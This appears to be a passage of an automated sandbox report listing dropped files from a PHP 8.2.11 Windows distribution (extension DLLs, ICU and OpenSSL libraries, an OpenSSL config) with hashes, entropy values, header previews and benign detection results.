                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........tL.@.".@.".@.".Im..T."..`#.B.".&z.E."..`'.L."..`&.H."..`!.D."..m#.F."..`&.s."..`#.B."..`#.C.".@.#..."..`*.A."..`".A."..`.A."..` .A.".Rich@.".........................PE..d...]..e.........." ......................................................... ............`A........................................p)..L....)..T...............h4..............H...`...T...............................8............................................text...8........................... ..`.rdata..F0.......2..................@..@.data....d...P.......*..............@....pdata..h4.......6...F..............@..@.rsrc................|..............@..@.reloc..H...........................@..B........................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_soap.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):261632
                                              Entropy (8bit):6.3084586176801976
                                              Encrypted:false
                                              SSDEEP:6144:pUCnHjdtqTB0gYG5aRzp/I0MHlCH8ePgmqd0nTjxjluxbcqTDM5:pUeX+YGoRKhCHRId0nmrTm
                                              MD5:D143954C4CFDA934031389D01DF76A8E
                                              SHA1:BE0ED5D4B76EA6C12790536C0E6E8B0DDEBB4B9D
                                              SHA-256:02DD664D61CB1E4DAE34A5E5C2A10AD0AECA9302639051EDE0F81FBF11412252
                                              SHA-512:7FBA2355227EE4A5647538D91AB9F7279F30DA85422ACEDAC7AEBD5069A153A41B8C199957D11BCA64256640358F94136BB4EC1E0BB71DD21717B9E9D1CED85C
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..^Y..^Y..^P.f^I..^..._[..^?..^Q..^..._T..^..._Q..^..._]..^..._[..^..._Z..^Y..^q..^..._^..^..._X..^...^X..^..._X..^RichY..^........................PE..d......e.........." ....."...................................................@............`A............................................L............ ..d....................0..$....L..T....................N..(... M..8............@..@............................text.... .......".................. ..`.rdata..v....@.......&..............@..@.data...............................@....pdata..............................@..@.rsrc...d.... ......................@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sockets.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):80896
                                              Entropy (8bit):5.967987544596397
                                              Encrypted:false
                                              SSDEEP:1536:LHGqpZFYedl+qutDnqcOYcn4oso8QQMvLOQNxJ+BfLpPw0za:LHGqvFYedl+qutDn1NcneQQMvSVfo0za
                                              MD5:AE5A5A4274A3D049D97790EE00747BB6
                                              SHA1:0093C47439EBC7E09ACC6FB4E2B422FE161EEAF9
                                              SHA-256:DF90739B0A531C6FCF8F55245B505EBFED96BA9F4F77F9E859AFF0BBA367212C
                                              SHA-512:14CBED47582F015B77C6DB5C086CB44610CA3E804BC57B37848A989679B49ED537D29C1F4F64D6E5F747DDCC5E7B23115023283A0C12839F3BCECB58B799BF05
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n..............................................".........C..."......"......"......"......Rich...........PE..d......e.........." .................................................................j....`A........................................ %.......%.......`.......P...............p..........T.......................(... ...8............................................text............................... ..`.rdata...g.......h..................@..@.data...(....@.......$..............@....pdata.......P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sodium.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):95744
                                              Entropy (8bit):5.736657370410124
                                              Encrypted:false
                                              SSDEEP:1536:oeEGulgbfm1es3+9L/sUsw88Hjbb/4hdtHZXXRnQgaUiaY2v67xoth13N3njp3f4:YWbe1ekdlwhrWoBnnlrj
                                              MD5:F604F58B4E0FA797854352FC52D025DE
                                              SHA1:5CDEEF2F05560CD0BB35395B490CD5C17C3533CB
                                              SHA-256:97A22CD1FB31E15BC726B561DF50097895F5B130351612F8D64C0B7CF87CD122
                                              SHA-512:E5417CE1E080A68F5F64BAFE3CE2D41A05CF67C3544E28DD5C4BEF6640BB494569D8EAF7A7F9BDE6ECE2A768186F27E93B1469669759B23391CF4241CE5047C8
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..............?....................................................^...........:...^.......^.......^.S.....^.......Rich............PE..d......e.........." .................................................................E....`A........................................@H..L....H..........,.......................,...L4..T............................4..8...............X............................text............................... ..`.rdata..............................@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...,............f..............@..@.reloc..,............p..............@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sqlite3.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):55296
                                              Entropy (8bit):5.649348250606528
                                              Encrypted:false
                                              SSDEEP:768:cYRfX+IDiSsvC/KTedFy3MIiTQKyoBl+MQ3sRBOWcXz0KZ3fmfe:cQ+jq8ed4MIiDv+MQ3sJcXHZ3efe
                                              MD5:D98AEBCA7AD78B5D6864B7238DEDBCCA
                                              SHA1:F869230D3E20BF8DF28066C81F34C4E78CCCDBC8
                                              SHA-256:721EB48BA3D7E22F6752B287376300530B6D5118F3FCD9687057FE581EE62A93
                                              SHA-512:659A83765014F21456815EEFEDF577DB15BA8D27C07B8E2310B0A9A19142C1A8FF681C2F7000A7E9DF0AD249698C1DEFEFF43A3BE1342D3F190624A665982C60
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J....m...m...m....6..m..\....m..\....m..\....m..\....m..E....m.......m.......m...m...m.......m.......m....Z..m.......m..Rich.m..........................PE..d......e.........." .....l...h......................................................Pq....`A...........................................P... ...........p...............................T.......................(...p...8............................................text....k.......l.................. ..`.rdata..NN.......P...p..............@..@.data...............................@....pdata..............................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_sysvshm.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):18944
                                              Entropy (8bit):5.2387854927965884
                                              Encrypted:false
                                              SSDEEP:384:GKKt6SZoxSl/cVq0sxuvbISUxDHKdapIkfu:nKtzVRedITxDppD
                                              MD5:34191A2151A81CA0BBC84CDAA17AE452
                                              SHA1:C6150C8F22B44C3D20B4E3611604D22BAB9CCBD6
                                              SHA-256:15450D7A66FE193614CD016006A5424C340EDC19CDE41E90FC66BC1870855462
                                              SHA-512:10047B3F1EF5B2C040C189B54BC44FEECA16A9911EF56D032A204039274A34942C6EBB49D646EC9CAFD1FF5BCAB20676D863FE7F95049B8E6849D2006F6A7189
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~mT.:.:.:.:.:.:.3t..>.:.hy;.8.:.hy?.0.:.hy>.2.:.hy9.9.:.qt;.8.:..y;.9.:.:.;...:..y2.;.:..y:.;.:..y..;.:..y8.;.:.Rich:.:.........PE..d......e.........." .........,......`.....................................................`A.........................................@..P....A..d....p..X....`..$....................8..T........................... 9..8............0...............................text...(........................... ..`.rdata.......0......................@..@.data........P.......8..............@....pdata..$....`.......:..............@..@.rsrc...X....p.......>..............@..@.reloc...............H..............@..B................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_tidy.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):754176
                                              Entropy (8bit):5.188336329604743
                                              Encrypted:false
                                              SSDEEP:12288:7hwCRJz9sI4/3Of3rgrWk6VU7hoXDGgP82:7hwCRJuI4/+jTwQ5
                                              MD5:DAC00EE2E2452EB6CE9EFD088114735D
                                              SHA1:F61D0266E0A6DDBBC08DC948C24A88EC38F79E15
                                              SHA-256:DC0E40EE90FC7AB061E278BD3581B2760D23C52A46F7A6ED84CC11659A8C6792
                                              SHA-512:8C45511C381DF3D625C99A5DAC08178A33157A320A3C64EC958A720E31CD235F4CD758F9DB63DB7060A59786CEC42316B0117741257D085B1D87BFFED4668FFC
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................d........................................................P...............................Rich...........................PE..d.../..e.........." ................P...............................................\C....`A............................................L............p..L....@...-...............1..@...T.......................(.......8............................................text...8........................... ..`.rdata...B.......D..................@..@.data....O.......F..................@....pdata...-...@......................@..@.rsrc...L....p.......F..............@..@.reloc...1.......2...P..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_xsl.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):288256
                                              Entropy (8bit):6.364579514841342
                                              Encrypted:false
                                              SSDEEP:3072:4deAMHPzFJvaPwEouJxw8UA4/wozFzM9cjhU5/zBLyIdl3OYZRwjBwkDM5R:XPz/vaP+88YoI9uqFRcBw6u
                                              MD5:F38C3A447B0C78C91EF8357E0CA58433
                                              SHA1:CEE764538AC188BC84CDE5CD9E89B3BD6F8F92F9
                                              SHA-256:CE3C7BEA72263797B56FE0219D4D694100CB5691CA5FF31C2E5AAB3AEDBDBC09
                                              SHA-512:451FF1790DA52FFDB5F1B431ABB889BD942290F3CBF63D74F83031CF555F68E63CBCE1BDE2E33FC28E1A4AEE4473CE7A612077BE7760654FF28A1B0B69AE3C41
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........".].C...C...C...;P..C...6...C...6...C...6...C...6...C...;...C..]6...C..W6...C...C...B..W6...C..W6...C..W6<..C..W6...C..Rich.C..................PE..d......e.........." .........n............................................................`A............................................L...............<....P...9..................p...T..............................8............................................text............................... ..`.rdata..8#.......$..................@..@.data...0....@......................@....pdata...9...P...:... ..............@..@.rsrc...<............Z..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zend_test.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):58880
                                              Entropy (8bit):5.6253628643647025
                                              Encrypted:false
                                              SSDEEP:768:Ss5AIBiqEUewBxgeoKe0k/bQxUDKpWtj/Uc4l3jZIsn2xwxSIY:QIBatu9eD/bQxUWpWZ/Ucc3jZ3n26AI
                                              MD5:014BC8F6CE678A25F100C1DC8A61BA4B
                                              SHA1:7AD4ABDB2F5B8BE3E526943AA5FDE2952C4D48A0
                                              SHA-256:482C6E82D176F3D2DD7FFE13314F8BC431C62484909C75B0946FDA5D204D4DF2
                                              SHA-512:763F52EBDF16B27F9B1C3D6688D070A1D4B7C3A53CFD46F9C30F4A566A625B383C842C5810B8336AAB28FD6C658BFF0804987F79B36E5FEB4D758411590A8D01
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................#...........M............................J.........&..J......J......J.O....J......Rich...................PE..d...Z..e.........." .....p...r.......s....................................... ............`A....................................................................................$...p...T.......................(......8............................................text...Hn.......p.................. ..`.rdata...Y.......Z...t..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_zip.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):380928
                                              Entropy (8bit):6.573576153900004
                                              Encrypted:false
                                              SSDEEP:6144:WYgi65NCJStw9xoJAJP/BddoHKepKyRG30TQVL2hCD+PANmxIzkZwr72HEJ+vy8M:lgi65bSxv66flOrMx4FBPmPDtNB6M
                                              MD5:138DB26956B7B1639327D17E0516DE4C
                                              SHA1:55731C5E2AE2EB81561BC87825692399E7589408
                                              SHA-256:F57884D64BF09E26B4673D4F8F096B7E5159DC87613D4DF141CE55B9F1DA8F45
                                              SHA-512:7A4FD0391075C6EA3DD01CF1F29D640FCB0EF9D3DA272447E77A9B7E4DD476F40FE41BC4DCF70178B0FE698682E3C3529570023693DAE6AF8F4D69750E0F7F26
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........mkT.............t.......y.......c.......y.......y.......y.......t.......c.......`......}y.......y...............y.......y.......y.......y......Rich............PE..d......e.........." ......................................................... ......1.....`A.........................................g.......r..........<.......l3..................$'..T............................'..8............0..(............................text...8........................... ..`.rdata..DY...0...Z..................@..@.data...P"...........p..............@....pdata..l3.......4..................@..@.rsrc...<...........................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\legacy.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):157184
                                              Entropy (8bit):4.852594644989125
                                              Encrypted:false
                                              SSDEEP:1536:6jmlWwhDgFPKehTUzo/6NXcyV+B4Y976VmCrv+2wbaLx5tVdWxOk:6mlLOb26H6VmCg4XQck
                                              MD5:45EF9FDFDF58DD21849618344FCD5013
                                              SHA1:0F1C4F5A140119D0F58A15892B815C9BD18BB8E7
                                              SHA-256:8AB0434565C24EE9782F82D9992226274F361F46AF4DF8B6F16E836724AB355A
                                              SHA-512:12227228BE5064B9803B2772682E51A041FBFA22A7AEA6D74C1D7D0841538A0531D561B75287AF5BDA36A211C7B4A30C12BB43D2A437951AABE92432E5FC064B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9B..W...W...W.......W..V...W...V...W..R...W..S...W..T...W...V...W...V.1.W...W...W...S...W...W...W.......W...U...W.Rich..W.................PE..d....I.c.........." ......................................................................`..........................................1..`....v..d.......i....P..................P.......8...............................8............p...............................text...T........................... ..`.rdata..@...........................@..@.data...A....@......................@....pdata.......P....... ..............@..@.idata..L....p.......6..............@..@.00cfg..Q............R..............@..@.rsrc...i............T..............@..@.reloc...............\..............@..B................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\extras\ssl\openssl.cnf

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):12682
                                              Entropy (8bit):5.013193619855737
                                              Encrypted:false
                                              SSDEEP:192:SGlLMl9scvTksXYNO6VHLiTk2Jf19wZXF4U2r0exc7Pf+LeHy8PoYBBzRiDAlsRq:BBkwsXgHLiTkifrMXF4j0C6vSccs
                                              MD5:20FC758B561CE2E76E71AC40A287DEB6
                                              SHA1:F4C976F454396C183B49EE9FE464FDEB9A9512F2
                                              SHA-256:A41ADAD50F74ECFDD9209CFE2C31F3BE2ABE4C15CE92C958C063C97C14C13B81
                                              SHA-512:7869F117BBC1228512A0DD24F9867EB319486C3268B9566F85DC4CBB71183A935C15F3873E0CEF93BD828D399BC9F7577B13797DCD1A942F232A9F72A6E7161C
                                              Malicious:false
                                              Preview:#..# OpenSSL example configuration file...# See doc/man5/config.pod for more info...#..# This is mostly being used for generation of certificate requests,..# but may be used for auto loading of providers....# Note that you can include other files from the main configuration..# file using the .include directive...#.include filename....# This definition stops the following lines choking if HOME isn't..# defined...HOME...= ..... # Use this in order to automatically load providers...openssl_conf = openssl_init....# Comment out the next line to ignore configuration errors..config_diagnostics = 1....# Extra OBJECT IDENTIFIER info:..# oid_file = $ENV::HOME/.oid..oid_section = new_oids....# To use this configuration file with the "-extfile" option of the..# "openssl x509" utility, name here the section containing the..# X.509v3 extensions to use:..# extensions..=..# (Alternatively, use a configuration file that has only..# X.509v3 extensions in its main [= default] section.)....[ new_oid

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\glib-2.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):1609728
                                              Entropy (8bit):6.490135446236633
                                              Encrypted:false
                                              SSDEEP:49152:y6KDdiyQNBpp2KE/nh6rVpgJqIaDUf9LSotvev:y6CMyQNomV2qVDUsZ
                                              MD5:BC1223D3D61C55D3897A83C2B5B61CDD
                                              SHA1:30C565CF4DCBA732EA0790E0CAD79184B955AA19
                                              SHA-256:94D07369EA7B82316A4E40CFF012E2FDC14692000976C10594259DF2568700CB
                                              SHA-512:1D7D564E8606086643777800BF20B06F134737FA908D90CC7EDE8075517287916F977B225864EE837ADB15969A78E7499066C6ECB9F25F0A13F8AC07C5E2E982
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".K.f.%.f.%.f.%.o...p.%.4.$.d.%....a.%.4. .m.%.4.!.n.%.4.&.b.%.=.$.k.%.f.$...%..-...%..%.g.%...g.%.f.g.%..'.g.%.Richf.%.........PE..d...&.Eb.........." .....B...Z......<..................................................... .................................................Lu..|.......p..............................p...........................`...8............`...............................text...XA.......B.................. ..`.rdata.......`...0...F..............@..@.data...@?.......0...v..............@....pdata..............................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\gmodule-2.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):18944
                                              Entropy (8bit):5.12600330611783
                                              Encrypted:false
                                              SSDEEP:192:ZR8n9fDWT6s25cmC26v56B0q7rRhUhU0pvXZWaRgemrU/Zh+:ZQRWT9k6TqXyU0pRVRgemrch+
                                              MD5:80C1039FBF71AE2B495BE6A74D51B044
                                              SHA1:D6F3867FB7709FA95E2B6C57C484AF2959600DF6
                                              SHA-256:DAE2CF13A53120FD2CE54D3AB3DE9E7561C8081262B218EF30D69E50228E91E3
                                              SHA-512:7277741352EF95187A41EAB720609200D57956ACAAF5A2CA7D2466BD5B031885360695823431D9BA701DAEBA4C8A8039116C68B147FECAC21393DF32FC5BA2F5
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.Q.>...>...>...F-..>...K...>...QC..>...K...>...K...>...K...>...K...>...V...>...>...>...K...>...K...>...KA..>...>)..>...K...>..Rich.>..................PE..d...'.Eb.........." ..... ...,...... #.................................................... ..........................................<..H...(>.......p..8....`..................4....5..p............................5..8............0..8............................text...H........ .................. ..`.rdata.......0.......$..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc...8....p.......B..............@..@.reloc..4............H..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icudt71.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):30422016
                                              Entropy (8bit):6.21588322660254
                                              Encrypted:false
                                              SSDEEP:393216:2+o33irYVI31BLF8diXUxDm7JlIWlj3iUl2noLg9WbkKyrDS/aOO47T/9r0PZxFB:0CrYVcbG
                                              MD5:298086405CD21481272FC4564296CAF4
                                              SHA1:EEB48769878CB95C97A7A35433E114A7C13A293A
                                              SHA-256:66941961F443446824B30BBD575AAC5D494F08D6709E65D0B6570D6315DDE0FE
                                              SHA-512:8D1AACC7014F3C602D366C5C6FBEE4A2ECCC726EE699D7EC6268F69AAB5BE28830E0C30E93CA25BFB801355D7557E34A026357B8249F850B295AEBC150E6FEB3
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........=..S...S...S...S...S.f.S...S.f.....S.f.Q...S.Rich..S.........................PE..d....b.........." .........0...............................................P............`.........................................p7..L............@..............................P7...............................................................................rdata..P(.......*..................@..@.rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuin71.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):3031552
                                              Entropy (8bit):6.5781376350329195
                                              Encrypted:false
                                              SSDEEP:49152:496EAQk79dx9iAUmtjXxOGyXVTrpRISk:mG9dP/eRe
                                              MD5:7E30DAE286E7A59499B67D9033A888BA
                                              SHA1:90D4862DE784510FE8E2C55E2AFDD4729839BA73
                                              SHA-256:F63A98728417E074DAED1BE9837E53E738C9996EE7720055127D8883397C4946
                                              SHA-512:F2BC1A4E2CABA40137AECF0C3C4C9E69171A0E21C298BF0B529E06CD4215207EBFEFDEE3E6F5955C9FED7E85C5F2F6D3EEF8FF23830A2AE601E6C6A2CD7F7DFB
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g..C...C...C...J~..M....s..G....s..T....s..K....s..G....n..A....s..@...C........s.......s..B....sd.B...C...B....s..B...RichC...........PE..d...y..b.........." ......................................................................`......................................... .$..r....+......@..@.....,..n...........P...+.. . .T..................... .(..... .8............................................text............................... ..`.rdata..>...........................@..@.data....v...P,..^...@,.............@....pdata...n....,..p....,.............@..@.rsrc...@....@......................@..@.reloc...+...P...,..................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuio71.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):60928
                                              Entropy (8bit):5.872647020600986
                                              Encrypted:false
                                              SSDEEP:1536:9io8ACxB+mfWDrA2FJwJwC0jz2j/+Yr/C:kfcGWDMEJwJwpjAV6
                                              MD5:952F6384DE9B6158BAC41E55538B6C70
                                              SHA1:9D45E1789EB910794403F7AF21AEDD51ECAFCFAF
                                              SHA-256:10D43C3BA11283D65F5CB2971908483B0648D99613B22F780B79BD8E34D9EC5D
                                              SHA-512:2BCA8D31BED7A5ADD815F23D5D0ADA9250AC18D023668E98F4AF57982A17D8D1711C6AEB27132F6F91D628DE3EDF59CBD84504032375031086DDE72F40808290
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.0...^...^...^.......^.V.[...^.V.Z...^.V.]...^.V._...^._._...^..._...^..._.^...W...^...^...^......^.......^...\...^.Rich..^.................PE..d......b.........." .........`...............................................0............`......................................... ...................@.................... ......x...T..............................8...............x............................text............................... ..`.rdata...@.......B..................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\icuuc71.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):2253312
                                              Entropy (8bit):6.60385820505218
                                              Encrypted:false
                                              SSDEEP:49152:79cdjhRD3enOQjzXfaFEqYWKrLJK+HMkVhyG:7907enO6aYxrR
                                              MD5:811D9E193A12B1AF1BB1FA71C3593107
                                              SHA1:E016519380A37E2296EB6C361FA52A5AD7A4524D
                                              SHA-256:7C6C41ADD54BC690A37343581AA0B79E0B601BFD995F0EC6ED0B21C08C94D34F
                                              SHA-512:087D1143D77AF9E29F5F6919511DF72C379332FBA6C80F290280937B56B52CC7836ABE117EEAE079E82799EE1ACBDC1929AC093A616D5F620833FD7048F6B77B
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......8.+*|fEy|fEy|fEyu..ynfEy..@xhfEy..AxtfEy..FxxfEy..DxzfEy...y~fEy'.DxxfEy..Dx.fEy|fDy.fEy..Lx.fEy..Ex}fEy...y}fEy|f.y}fEy..Gx}fEyRich|fEy........................PE..d......b.........." ................p........................................."...........`.........................................`...8....(!.@....p".H.....!...............".<+..@...T...............................8............................................text............................... ..`.rdata...F.......H..................@..@.data....5...@!......"!.............@....pdata........!......>!.............@..@.rsrc...H....p".......".............@..@.reloc..<+...."..,...6".............@..B................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\lib\enchant\libenchant2_hunspell.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):475648
                                              Entropy (8bit):6.989030023863517
                                              Encrypted:false
                                              SSDEEP:12288:NE82kBAHEvlAs6P9jEGdYFAPsByypqSFO2y:j2kBAHE+s6P9jEG+F3ByKqSY2y
                                              MD5:492FC6FADC00402CDC90599AAB630763
                                              SHA1:A4A5FB9C42B6D85518BEF69126F6EE534E547A74
                                              SHA-256:A36C34AA22EC0D718BF2709D76F79365EFFBE238292C7800D678CB9EA0AE58AF
                                              SHA-512:4305975A8B84601FBA0FCC8255461DC7118EDA3D1E49CCCD97E26B4CA114B92917FDB964459639D3B7654E2A018119D241C2CD9710D78D8057725E30669365FE
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.....tB..tB..tB...B..tB.$.B..tB..pC..tB..wC..tB..qC..tB..uC..tB..uC..tBS.uC..tB|.uC..tB..uB..tB..}C..tB..tC..tB..B..tB..vC..tBRich..tB................PE..d... ?.^.........." .................q.................................................... .............................................d...T........`.......@...............p..t.......p................... ...(.......0............................................text............................... ..`.rdata...M.......N..................@..@.data...XD.......@..................@....pdata.......@....... ..............@..@.rsrc........`.......>..............@..@.reloc..t....p.......@..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libcrypto-3-x64.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):5202432
                                              Entropy (8bit):5.964268397464083
                                              Encrypted:false
                                              SSDEEP:98304:Ff+zdIUupuTXfY8Q2I8PFj1CPwDvt3uFcDC4AB:B+IUupuTXfY8Q2I8dj1CPwDvt3uFcDCp
                                              MD5:DB14ED0FBF1A8F0379A506F733DAE5FA
                                              SHA1:3EA7CF3264F5D27C843A19730E67EF78D2CD9AD6
                                              SHA-256:3918BF3C2DBE2767FBA9C6AC2BFD41BD3421CFCA1F637AC7F729123B4F13230B
                                              SHA-512:EFA441C47DC4627F8BCF6A7894B48FF272F0ACAB35162DF78D05FFC3563995AE6AD406378EDE4ABB6842932627064CC90C50F971542A4535FF07C2B5F39793B1
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V.}...}...}....?..}.......}.......}.......}.......}...}..\}.......}...}...}..Z....~..Z....}..Z.S..}..Z....}..Rich.}..........................PE..d....E.c.........." .....^7..6......S.........................................O...........`..........................................KH.......N.T.....O.s.....K..............O....|4D.8............................4D.8.............N..............................text....]7......^7................. ..`.rdata.......p7......b7.............@..@.data....t...`K..@...HK.............@....pdata........K.......K.............@..@.idata...)....N..*...\N.............@..@.00cfg..Q.....N.......N.............@..@.rsrc...s.....O.......N.............@..@.reloc..3.....O.......N.............@..B................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\libenchant2.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):42496
                                              Entropy (8bit):5.724441360615926
                                              Encrypted:false
